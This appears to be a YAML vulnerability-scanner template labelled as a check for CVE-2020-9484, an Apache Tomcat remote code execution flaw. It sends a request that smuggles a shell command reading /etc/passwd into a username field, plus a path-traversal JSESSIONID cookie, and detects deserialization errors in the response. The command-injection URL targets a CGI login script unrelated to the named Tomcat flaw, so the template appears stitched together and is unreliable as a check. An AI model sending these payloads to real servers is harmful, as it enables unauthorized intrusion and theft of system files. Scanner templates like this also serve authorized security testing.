id: CVE-2020-9484 info: name: Apache Tomcat RCE risk: Critical params: - root: '{{.BaseURL}}' requests: - method: GET url: >- {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy detections: - >- StatusCode() == 500 && RegexSearch("resBody", "Exception") && RegexSearch("resBody", "ObjectInputStream") && RegexSearch("resBody", "PersistentManagerBase") references: - https://www.cvebase.com/cve/2020/9484